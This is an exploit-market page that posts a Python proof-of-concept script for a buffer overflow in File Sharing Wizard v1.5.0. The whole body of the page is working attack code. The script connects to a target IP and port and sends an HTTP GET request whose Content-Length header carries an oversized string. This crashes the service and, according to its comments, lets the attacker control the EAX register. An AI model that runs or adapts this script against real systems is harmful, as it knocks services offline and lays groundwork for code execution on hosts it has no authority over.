[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

File Sharing Wizard v1.5.0 Buffer Overflow PoC

Author
m1k3
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12714
Category
dos / poc
Date add
15-06-2010
Platform
windows
==============================================
File Sharing Wizard v1.5.0 Buffer Overflow PoC
==============================================


#!/usr/bin/python
 
# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008
#
# controlling EAX
# ESP points to our buffer
# buffer grows if we increase our string
#
# more details on http://www.s3cur1ty.de
# have fun m1k3 [at] m1k3 [dot] at
 
import socket
import sys
 
if len(sys.argv) < 2:
print "Usage: vrfy.py <IP-Adr> <port>"
sys.exit(1)
 
ips = sys.argv[1]
port = int(sys.argv[2])
 
 
string = "A"*51
string += "B"*4 #controlling eax
string += "C"*500
 
header = "Content-Length"
 
print "starting the attack for:", ips
print ""
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)
 
print "\r\nsending payload"
print "..."
payload = (
'GET http://%s/ HTTP/1.0\r\n'
'%s: %s\r\n'
'\r\n') % (ips,header,string)
 
s.send(payload)
s.close()
 
print "finished kicking device %s" % (ips)
print "... the service should be crashed ... check eax"



#  0day.today [2024-11-04]  #